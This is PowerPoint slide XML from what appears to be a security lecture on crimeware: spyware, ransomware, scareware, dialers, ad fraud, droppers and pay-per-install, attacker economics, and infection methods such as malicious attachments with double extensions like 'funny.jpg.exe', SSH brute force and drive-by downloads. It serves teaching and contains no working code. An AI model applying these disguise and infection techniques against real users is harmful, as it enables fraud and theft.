        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9503699D-9892-4D63-B4EE-614EC06D15AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="8568765" cy="4790328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that passively observes the user without their knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keyloggers stealthily record all keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Screen scrapers record everything on the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used to steal credentials and accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personal information like social security number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bank accounts, credit cards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webmail, social networking, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modern examples may record audio or webcam video</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used for extortion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4680B183-B07B-43B0-8484-7AF571529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8812" y="141941"/>
            <a:ext cx="2741706" cy="2741706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242714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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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1C86-34A5-4C13-AB0B-C9D1FA36C081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$$$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1288CA-8470-439D-9904-E0C9151A01EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dialers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Old school scam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modem: call expensive 1-900 numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cell connection: send SMS to “premium messaging” services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scareware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake anti-virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt the victim’s files, demand payment for the decryption key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often relies on cryptocurrency to avoid banks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Likelihood of receiving the key, even if you pay, is not great</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122179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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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6" end="6"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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96986-419E-45ED-A60E-9FE68A7E0FCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$$$, continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F570DC3F-611B-4EFB-83B7-D5BECD5A2E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ad fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject ads into the user's browser, or onto their desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Surreptitiously click on ads on the attacker’s own website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Droppers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from other attackers for a fee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pay-per-install services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crypto currency mining</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62531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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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 Mechanisms vs. Attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4837568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus on attackers themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who are they? What are their motivations?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Hacking” used to be about street cred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>31337 hackers vs. script-kiddies and n00bs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virus writing, website defacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today, “hacking” is primarily about money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Organized cybercrime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diverse set of actors with different skills (some technical, some not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marketplace with specialization and its own economy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201881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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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9" end="9"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40"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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Crimeware Distribution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Computers don’t just infect themselves…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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995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9086-3FEA-4151-BC96-1E8F8ABF3A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Methods of Compromise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85230EBA-4B2C-4849-A8EE-C046CFD668E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware email attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverages social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attachment may be a malware program in disguise, or…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May leverage an exploit in another piece of software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connect to servers and probe them for known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute force remote access credentials, e.g. SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting browser bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Known as drive-by exploits or drive-by downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get the victim to visit a webpage containing exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299797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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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682E5-BEAD-488A-BFAA-09E65F5B1F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="41836"/>
            <a:ext cx="10515600" cy="1165208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware Attachments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2999C2-70C8-455E-B8B5-B1B02068ECDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1277945"/>
            <a:ext cx="10515600" cy="1449481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send spam containing malicious attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use social engineering to trick users into downloading &amp; opening the attachments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC0D3C0D-D80C-4B68-884F-60F046028839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="32433" y="3191206"/>
            <a:ext cx="4051494" cy="3253857"/>
            <a:chOff x="32433" y="3191206"/>
            <a:chExt cx="4051494" cy="3253857"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8401BD-DBDB-4C0C-88E6-1F8B5AC26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861" y="3883653"/>
              <a:ext cx="1148773" cy="1148773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE3845D-BC56-44B9-ABDC-E1FB22D6D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71" y="5240805"/>
              <a:ext cx="1204258" cy="1204258"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5D3170-C183-415E-9CB7-6A54F3865D26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1446309" y="4257984"/>
              <a:ext cx="1561389" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>funny.jpg.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79A37BE-2FF5-4407-9BB4-D15BBFED5E8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1388037" y="5642879"/>
              <a:ext cx="2022157" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>contract.docx.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C13A692-DCF0-4B21-90EC-D17D331F5D1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="32433" y="3191206"/>
              <a:ext cx="4051494" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
                <a:t>Misleading Icons and File Extensions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB5F62D6-601E-4B5D-8B5F-1FC559EDB361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4160082" y="3191206"/>
            <a:ext cx="3142488" cy="3226115"/>
            <a:chOff x="4160082" y="3191206"/>
            <a:chExt cx="3142488" cy="3226115"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF7AD46-B4D8-4C42-B401-6AEA8C0AE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609" y="5268548"/>
              <a:ext cx="1148773" cy="1148773"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07600DD0-8583-49D1-9AF1-C3D08DBBD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082" y="3855910"/>
              <a:ext cx="1204258" cy="1204258"/>
            </a:xfrm>
